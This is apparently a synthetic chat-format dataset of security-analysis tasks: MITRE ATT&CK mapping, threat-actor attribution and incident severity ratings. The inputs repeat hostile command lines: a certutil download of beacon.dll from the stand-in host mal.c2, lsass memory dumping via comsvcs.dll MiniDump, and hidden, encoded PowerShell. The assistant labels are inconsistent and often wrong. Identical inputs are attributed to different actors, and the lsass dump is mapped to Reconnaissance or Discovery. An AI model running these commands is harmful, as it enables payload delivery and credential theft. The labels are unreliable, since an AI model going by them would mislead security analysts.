messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1931 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.3.244.88", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"t...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when i...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-KFQAU6BB6H)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Persistence", "role": "user" }, { "content": "{\"sev...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-4DWAPC25GD)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Reconnaissance, Collection", "role": "user...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"technique...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: YAHOYAH decrypts downloaded files before execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confidence\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: For example, tech support scams can be facilitated through Phishing, vishing, or various forms of user interaction.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Some legitimate LaunchDaemons point to unsigned code that could be exploited.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.004\", \"T1543\"]}", "r...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-XUYXUDRC1H)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact, Credential Access, Exfiltration", "role": "user" }, { "cont...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.116.71.124", "role": "user" }, { "content": "{\"tactics\": [\"TA004...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2454 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.13.133.122", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3545 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.114.9.198", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"technique...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for changes made to launch agents to repeatedly execute malicious payloads as part of persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T154...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.90.243.39", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0011...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3480 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.189.116.62", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0011\"], \"technique...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-6T3UTZ8YST)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact, Discovery", "role": "user" }, { "content": "{\"sev...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": \"Hi...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CARROTBAT has the ability to execute command line arguments on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assist...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.78.192.112", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-7TBUEVO7V9)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Collection, Impact", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 961 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.139.43.235", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0002\", \"TA0003\"], \"te...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-8LKUD6K288)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution, Reconnaissance", "role": "user" }, { "content": "{\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: MoonWind encrypts C2 traffic using RC4 with a static key.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Lazarus Group has targeted specific individuals within an organization with tailored job vacancy announcements.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1591.004\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1583.001\", \"T1...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Exploit Analysis Despite being an older vulnerability, many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0004\"], \"techniques\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-YUZCKDSBBK)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Ext...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: and then deletes the original launcher", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: LockerGoga has been signed with stolen certificates in order to make it look more legitimate.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1553\", \"T1553.002\"]}", "rol...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-NCEA37130D)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Execution, Reconnaissance, Defense Evasion", "role": "user" }, { "co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-HVZ4E0SUKV)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"Hi...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: VPN and to persist in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1133\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3695 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.27.232.96", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0003\"], \"techniques\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Direct Network Floods are when one or more systems are used to send a high-volume of network packets towards the targeted service's network.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-3CUAHRL90G)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Initial Access", "role": "user" }, { "content...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-7LNEMMV3OO)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Lateral Movement, Credential Access, Exfiltration", "role": "user" }, { ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.13.152.152", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 628 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confi...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: By default, only Administrators may remotely activate and launch COM objects through DCOM.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.003\", \"T1021\"]}", "...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 586 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.141.171.200", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-ILDFTMK1US)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Initial Access", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-Z55FKV1X06)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Persistence, Impact", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kessel has trojanized the ssh_login and user-auth_pubkey functions to steal plaintext credentials.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\"T1556\"]}", "ro...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confi...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.138.170.3", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0003...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-WRGGVXIXXW)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Discovery, Collection, Impact", "role": "user" }, { "c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1844 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.35.238.207", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1017 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.123.240.6", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1098.004...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.59.31.129", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0007\"], \"techni...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.183.153.246", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0005\", \"TA0008\"],...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BADFLICK has uploaded files from victims' machines.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-8BGRV8EOD5)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-YZQ15M4ZF7)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Discovery", "role": "user" }, { "content": "{\"severity...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: For each user, this file resides at the same location: ~/.bash_history.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552.003\", \"T1552\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-K6I67OOF32)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Execution, Exfiltration", "role": "user" }, { "c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3902 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.189.216.199", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-0DWW9HR42N)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Critical...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.61.96.162", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T153...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.155.62.80", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3125 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.166.62.166", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techn...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1557 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-1B6NNNBOCX)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation, Initial Access", "role": "user" }, { "co...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: LoadPackagedLibrary()", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Skidmap has the ability to download files on an infected host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Tomiris can download files and execute them on a victim's system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\": \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.008...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.106.90.119", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA000...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for changes made to windows registry keys or values that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", "role": "user" }, { "co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-MZ3RD7LHE9)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access, Lateral Movement, Privilege Escalation", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-NF9BQ8TEQH)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-KTERSV1A9Q)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\": \"Extre...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.138.40.171", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0004\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confi...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ixeshe can list running services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1007\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1685 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.23.76.166", "role": "user" }, { "content": "{\"tactics\": [\"TA0005...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level.", "role": "user"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-SIIM3N3ZXL)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Initial Access", "role": "user" }, { "content": "{\"severity...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Carbanak has used a VBScript named \"ggldr\" that uses Google Apps Script, Sheets, and Forms services for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1102.002\", \"T1102\"]}", "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-DPCUXOMYAP)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Defense Evasion", "role": "user" }, { "content"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: RainyDay has downloaded as a XOR-encrypted payload.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-LNBHZ8SDWB)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Privilege Escalation", "role": "user" }, { ...